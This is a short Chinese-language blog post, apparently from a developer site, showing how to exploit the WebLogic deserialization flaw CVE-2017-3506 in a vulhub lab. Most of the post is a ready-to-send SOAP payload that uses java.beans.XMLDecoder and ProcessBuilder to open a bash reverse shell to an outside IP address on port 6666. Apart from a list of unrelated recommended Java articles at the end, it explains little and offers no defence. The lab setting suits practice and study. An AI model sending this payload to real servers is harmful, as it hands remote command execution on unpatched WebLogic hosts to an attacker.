webLogic反序列化漏洞CVE-2017-3506

1.环境搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

2.判断wls-wsat组件是否存在

拼接/wls-wsat/CoordinatorPortType

查看页面是否有回显 有回显说明存在组件

3.在当前页面抓包 反弹shell

添加请求包内容

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

<soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.8.0_131" class="java.beans.XMLDecoder">

<object class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/47.121.211.205/6666 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></object>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

成功反弹shell

相关推荐
不良手残几秒前
IDEA类和方法注释模板设置-保姆教程
java·开发语言
GoodStudyAndDayDayUp6 分钟前
调用海康API预览视频
java·海康
李迟11 分钟前
在Linux服务器上使用kvm创建虚拟机
java·linux·服务器
Dcs11 分钟前
6 个 PWA 高阶策略,助你提升用户留存与参与度
java
hdsoft_huge16 分钟前
Spring Boot 高并发框架实现方案:数字城市的奇妙之旅
java·spring boot·后端
就改了42 分钟前
JUC小册——公平锁和非公平锁
java·开发语言
ThetaarSofVenice1 小时前
垃圾收集相关算法Test
java·jvm·算法
秉承初心1 小时前
将Maven依赖上传到Gitee Packages并让他人引用方案(AI)
java·gitee·maven
深栈解码1 小时前
JUC并发编程 synchronized与锁升级
java·后端
非ban必选1 小时前
spring-ai-alibaba官方 Playground 示例
java·人工智能·spring